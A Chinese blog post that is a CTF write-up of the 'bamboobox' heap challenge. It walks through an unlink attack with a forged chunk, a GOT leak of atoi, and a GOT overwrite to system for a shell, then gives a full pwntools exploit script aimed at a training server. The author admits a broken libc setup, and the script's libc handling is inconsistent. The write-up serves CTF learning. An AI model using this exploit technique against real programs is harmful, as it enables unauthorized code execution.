bamboobox和unlink

最新推荐文章于 2024-06-08 09:33:02 发布
最新推荐文章于 2024-06-08 09:33:02 发布
阅读量145 收藏 1
点赞数
分类专栏: pwn 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62326489/article/details/125764317
版权

bamboobox两种利用方式,一种通过修改top chunk进行堆溢出,一种通过unlink,这边只讲unlink的方式

首先checksec

这里是可以劫持got表的

程序先跑一下

 就是一个很正常的添加东西的并且输出的程序

 然后ida

 一般来说问题都会出在add和delete的位置上?然后先看add的部分吧

然后看itemlist位置

 从0x6020c0开始,按照堆的规矩,第一个位置放的是size,后面的位置放别的,也就意味着我们的name位置将会放在0x6020c8的位置,然后用gdb看一下堆的存储方式和顺序

 

 对应的是我们输入的大小20

这边不是0x6032b0的原因是我们使用的是mem指针,在之前的文章中说了,最前方的两个位置无法使用,所以要加上0x10

 然后就是想要拿到shell,因为前面说了可以对got表进行劫持也就意味着我们可以通过自带的函数把地址输出来直接atoi的运行地址然后计算得到得到libc的偏移,所以要解决的问题就是伪造一个fake  chunk

总体思路

1首先申请三个堆块

2然后伪造一个fake chunk让系统认为是空,在释放时向前合并

 3然后由于unlink的机制会使指针指向-3的位置上,对于0号堆而言

4此时将name改成atoi的got表地址就能输出位置,然后通过libc计算得出system函数的地址,然后进行覆盖,在后面的有调用atoi函数时输入bin/sh,就可以调用system bin/sh

 具体过程

add(0x40,'a' * 8)	//0
add(0x40,'b' * 8)   //1
add(0x40,'c' * 8)   //2

 申请三个堆块

ptr = 0x6020c8 //全局变量数组list的首地址

 然后伪造fake chunk

fake_chunk = p64(0)			//pre size为0
fake_chunk += p64(0x41)		//这里是因为申请0x40分配空间为0x50,要去掉前面的pre size和size的位置
fake_chunk += p64(ptr-0x18)	//fd
fake_chunk += p64(ptr-0x10)	//bk
fake_chunk += 'c'*0x30		//这里相当于0x50-48=0x30
fake_chunk += p64(0x40)		//覆盖chunk1的prev_size
fake_chunk += p64(0x50)		//覆盖chunk1的size,标志位置0

这里fd和bk的计算方式

pre size    +0

size           +1

fd             +2

bk             +3

可知fd的值为&chunk1-3,按照检查机制p->fd->bk=&chunk1-3+3=&chunk1,即完美的满足了监测机制,同理p->bk->fd=&chunk1-2+2=&chunk1,然后在这道题里,相当于要乘8,即为0x18和0x10
 

payload = p64(0) * 3		
atoi_got = elf.got["atoi"]
payload += p64(atoi_got)

这里的p64(0)的3个主要是为了占位,应为之前说了指向的是name-3的位置,所以需要有三个字母进行占位然后调用show函数进行输出

atoi_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8,b"\x00"))

然后anzhaolibc的计算方法得出system的地址,然后用system的got表地址覆盖atoi的got表地址,在choice的后面输入bin/sh进行调用

wp的话电脑最近好像被玩崩了,libc有点问题,在重装glibc,反正大概这样,实在不行之后再改吧

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context(arch='amd64', os='linux')
#r = process('./llll')
r= remote("node4.buuoj.cn",26018)
elf = ELF('./llll')
#libc = elf.libc
libc=ELF('libc-2.33.so')
def add(length,name):
    r.recvuntil(":")
    r.sendline('2')
    r.recvuntil(':')
    r.sendline(str(length))
    r.recvuntil(":")
    r.sendline(name)

def edit(idx,length,name):
    r.recvuntil(':')
    r.sendline('3')
    r.recvuntil(":")
    r.sendline(str(idx))
    r.recvuntil(":")
    r.sendline(str(length))
    r.recvuntil(':')
    r.sendline(name)

def remove(idx):
    r.recvuntil(":")
    r.sendline("4")
    r.recvuntil(":")
    r.sendline(str(idx))

def show():
    r.recvuntil(":")
    r.sendline("1")


add(0x40,'a' * 8)    
add(0x40,'b' * 8)
add(0x40,'c' * 8)

ptr = 0x6020c8         

fake_chunk = p64(0)            
fake_chunk += p64(0x41)        
fake_chunk += p64(ptr-0x18)    
fake_chunk += p64(ptr-0x10)    
fake_chunk += b'c'*0x30    
fake_chunk += p64(0x40)        
fake_chunk += p64(0x50)        
edit(0,0x90,fake_chunk)        
#gdb.attach(r)
remove(1)                    
                            
payload = p64(0) * 3        
atoi_got = elf.got["atoi"]
payload += p64(atoi_got)

edit(0,len(payload),payload)    
#gdb.attach(r)

show()                        


r.recvuntil("0:")

atoi_addr = u64(r.recvuntil(":")[:6].ljust(8,b'\x00'))
libc=LibcSearcher('atoi',atoi_addr)
libcbase = atoi_addr - elf.libc.symbols['atoi']    

system_addr = libcbase + elf.libc.symbols['system']
edit(0,0x10,p64(system_addr))    
gdb.attach(r)
r.recvuntil(":")
r.sendline("/bin/sh")     
r.interactive()
 

名字被注册了诶
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
堆利用之unlink
chenzhenyu1983的博客
04-30 568
一 small bin,large bin等的内存结构 未分配的chunk |  pre chunk size  |   size  |F|C|P| |  fd       |         bk         | presize: 前一个块的大小(如果前一个块是空闲的) size:当前块的大小 F标志位:目前还没有用 C标志位:如果当前块已被分配,置1;否则,置0 P标志位:如果前一个块已被...
Linux下堆溢出利用3-bamboobox解题思路之unlink
haibiandaxia的博客
09-08 622
#coding=utf8 from pwn import * context.log_level = 'debug' context(arch='amd64', os='linux') local = 1 elf = ELF('./bamboobox') if local: p = process('./bamboobox') libc = elf.libc else: p = remote('116.85.48.105',5005) libc = ELF('./libc.
暑假集训——Hitcon_Trainning——lab11_bamboobox——堆unlink
qq_41667316的博客
07-15 414
UNLINK 思路 其实是艰辛的心路历程 这道题是昨天晚上这个时间就想到的思路 [虽然是道基础题但是是难得的一道没看别人exp就想到怎么写的题,当时觉得自己已经登顶了(bushi] 毕竟是一道套路题的确套路了我【微笑.jpg】 change_note这个函数里面没有检查输入长度,堆溢出。堆的几个漏洞里面,堆溢出我只会unlink,所以就顺着这个思路一直往下写了。 UNLINK 概念 合...
unlink】hitcontraining_bamboobox
huzai9527的博客
05-13 172
unlink】hitcontraining_bamboobox 1. ida分析 有存放全局指针的数组,存放格式为itemlist[0]为size,itemlist[1]为指向item的指针 change时没有检测输入长度,存在堆溢出 2.思路 申请3个chunk,编辑chunk0 ,构造fake chunk,溢出到chunk1的size位 free chunk1,unlink后itemlist[1] ->itemlist[-2] 再次编辑chunk0,即编辑item
[BUUCTF]PWN——hitcontraining_bamboobox(House of force+unlink
mcmuyanga的博客
03-02 1231
hitcontraining_bamboobox 附件 步骤 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的执行情况,经典的堆题的菜单,并且根据第一行的提示,估计存在后门 64位ida载入,猜测有后门,检索字符串果真发现了后门,不过根据buu的习性,一般flag在根目录下,这个后门应该用不大上,先记一下magic_addr=0x400d49 main()函数,发现输入5的时候会去执行v4[1],v4[1]里面是goodbye_message的地址,如果后门的
unlink命令 删除指定文件
01-20
和rm命令作用一样 ,都是删除文件。 语法格式:unlink [参数] 常用参数: –help 显示帮助 –version 显示版本号 参考实例 删除test文件: [root@linuxcool ~]# unlink test.file 与该功能相关的Linux...
Linux unlink函数和删除文件的操作方法
01-09
1. unlink函数   对于硬链接来说,unlink 用来删除目录项,并把 inode 引用计数减 1,这两步也是一个原子过程。直到 inode 引用计数为 0,才会真正删除文件。   对于软链接来说,unlink 直接删除软链接,而不...
php中unlink()、mkdir()、rmdir()等方法的使用介绍
10-27
unlink()函数删除文件 、mkdir()函数创建目录、rmdir()函数删除目录这些方法在文件相关的处理方法会经常使用到,本文整理了一些,需要的朋友可以了解下
堆漏洞之unlink1
08-04
unlink 漏洞利用技巧的核心就在下面这几行代码:SP00F|版权属于我个人所有,你可以用于学习,但不可以用于商业目的漏洞利用的技巧就是覆盖相邻(下一个或下下
HITCON training lab 11——bamboobox
04-23 549
64位程序  #House Of Force 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 _QWORD *v3; // [rsp+8h] [rbp-18h] 4 char buf; // [rsp+10h] [rbp-10h] 5 ...
hitcontraining_bamboobox
像初雪一样自由洒落
04-24 694
hitcontraining_bamboobox这道题有两种解题方式: house of force 参考:house of force unlink house of force(详解) 知识点 只要top chunk size够大,就能随意申请chunk 所以,如果有溢出能控制top chunk size,就可以修改其为-1(0xffffffff最大值),然后malloc(负数)可以向上申请,malloc(正数) 题目流程 程序一开始申请0x10的块,存放hello_message和.
堆溢出——unlink漏洞攻击(bamboobox
fzucaicai的博客
03-22 752
当要free掉某个堆块时,如果其低地址的chunk是空闲的,那么这里的P就是被释放掉的堆块的地址减去自己的pre_size里的数值,这样就可以指向低地址的chunk的chunk头了,通过堆溢出修改掉被释放的chunk的pre_size和size,就可以达到释放该chunk时,unlink调用的P是是指向假chunk的chunk头。1.首先检查被合并的chunk的大小是否正确,程序会先检查被合并的chunk的size是否与其物理相连的下一个chunk的presize是否相符。
堆利用-house_of_force-bamboobox题详解
qq_43390703的博客
11-14 433
bamboobox 基本情况分析 查看基本保护 RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE Partial RELRO Canary found NX enabled No PIE No RPATH No RUN
堆学习入门
Peanuts
02-22 839
借助hitcon training的题目对三种堆的利用方法进行了一个系统的学习,刚入坑的堆小白们可以一起学习一下。题目链接:https://github.com/scwuaptx/HITCON-Training Use after free 记录一波建立文件过程 mkdir + name touch + name echo 'context' > n...
Linux下堆溢出利用4-bamboobox解题思路之house of force
haibiandaxia的博客
10-10 309
Linux下堆溢出利用4-bamboobox解题思路之house of force1 前言2 程序和调试环境准备2.1 实验环境2.2 实验目标3 反编译程序3.1 检查安全机制3.2 main函数 1 前言 因这段时间在忙护网,再加上对堆块进行负方向移动不理解,导致更新迟了一些,后来经过反复调试,查看堆状态,才慢慢理解,详细内容见正文吧。 2 程序和调试环境准备 2.1 实验环境 Linux ubuntu 16.04.1 gdb 7.11.1 bamboobox(目标程序) Python 2.7.12
【PWN-HEAP】Unlink学习笔记
SWEET0SWAT的博客
09-02 772
题目练习 HITCON2016 bamboobox 反编译情况: 程序分析
删除目录
橙子味冰可乐的博客
06-07 526
shutil.rmtree("C:\\demo\\test") # 删除C:\demo目录下的test子目录及其内容。os.rmdir("C:\\demo\\test\\dir\\mr") # 删除C:\demo\test\dir\mr目录。path = "C:\\demo\\test\\dir\\mr" # 指定要创建的目录。os.rmdir("C:\\demo\\test\\dir\\mr") # 删除目录。
自制植物大战僵尸:HTML5与JavaScript实现的简单游戏
最新发布
m0_73367097的博客
06-08 1908
自制植物大战僵尸
unlink函数
05-24
unlink函数是一个系统调用,用于删除指定的文件名。它的原型如下: ```c #include int unlink(const char *pathname); ``` 其中,pathname表示要删除的文件名。 使用unlink函数删除文件时,需要注意以下几点: ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值